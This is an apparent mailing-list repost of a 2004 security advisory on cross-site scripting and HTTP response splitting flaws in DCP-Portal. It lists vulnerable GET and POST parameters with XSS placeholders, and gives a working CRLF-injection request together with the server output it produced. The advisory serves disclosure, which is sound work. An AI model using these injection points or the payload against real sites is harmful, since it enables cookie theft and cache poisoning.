OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
[Maxpatrol Security Advisory] Multiple vulnerabilities in DCP-Portal

From: Alexander Antipov (antipovSecurityLab.ru)
Date: Wed Oct 06 2004 - 09:14:17 CDT


Title: [Maxpatrol Security Advisory] Multiple vulnerabilities in
DCP-Portal

Date: 28.09.2004
Severity: Low

Application: DCP-Portal, dcp-portal

Platform: PHP

I. DESCRIPTION
--------------
Multiple vulnerabilities were found in DCP-Portal. A remote user can
conduct cross-site scripting attacks and HTTP response splitting
attacks.
<p>
1. XSS in GET
/calendar.php?year=[XSS code here]&month=09&day=01
/calendar.php?year=2004&month=[XSS code here]&day=01
/calendar.php?year=2004&month=09&day=[XSS code here]
/index.php?page=annoucements&cid=[XSS code here]
/annoucement.php?aid=8&cid=[XSS code here]
/news.php?nid=34&cid=[XSS code here]
/contents.php?cid=[XSS code here]
/index.php?cid=[XSS code here]

2. XSS in post

POST /index.php?page=send_write HTTP/1.1
Host: dcp-portal
Content-Type: application/x-www-form-urlencoded
Content-Length: 91

PHPSESSID=1&yname=1&yadd=1&fname=1&fadd=1&url=[XSS code here]

POST /search.php HTTP/1.1
Host: dcp-portal
Content-Type: application/x-www-form-urlencoded
Content-Length: 59

PHPSESSID=1&q=XSS code here]&fields=1

POST /register.php HTTP/1.1
Host: dcp-portal
Content-Type: application/x-www-form-urlencoded
Content-Length: 137

PHPSESSID=1&sex=1&sex=1&name=1&surname=1&email=scannerptsecurity.com&ad
dres
s=1&zip=1&city=1&country=[XSS code here]

3. HTTP response splitting

POST /calendar.php?show=full_month HTTP/1.1
Host: dcp-portal
Content-Type: application/x-www-form-urlencoded
Content-Length: 200

PHPSESSID=%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.0%20200%20OK%0d%0a
Cont
ent-Type:%20text/html%0d%0aContent-Length:%2034%0d%0a%0d%0a%3chtml%3eSca
nned
%20by%20PTsecurity%3c/html%3e%0d%0a&s=1&submit=1

Result

<...>
(Unix) mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4
PHP/4.3.8 FrontPage/5.0.2.2634a mod_ssl/2.8.19 OpenSSL/0.9.7a
X-Powered-By: PHP/4.3.8
Set-Cookie: PHPSESSID=
Content-Length: 0

HTTP/1.0 200 OK
Content-Type: text/html
Content-Length: 34

<html>Scanned by PTsecurity</html>
; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
pre-check=0
Pragma: no-cache
Transfer-Encoding: chunked
Content-Type: text/html
<...>

II. IMPACT
----------

A remote user can access the target user's cookies (including
authentication cookies). A remote user may be able to poison any
intermediate web caches with arbitrary content.

III. SOLUTION
-------------

Not available currently.

IV. VENDOR FIX/RESPONSE
-----------------------

n/a

V. CREDIT
-------------

This vulnerability was discovered by Positive Technologies using
MaxPatrol (www.maxpatrol.com) - intellectual professional security
scanner. It is able to detect a substantial amount of vulnerabilities
not published yet. MaxPatrol's intelligent algorithms are also capable
to detect a lot of vulnerabilities in custom web-scripts (XSS, SQL and
code injections, HTTP Response splitting).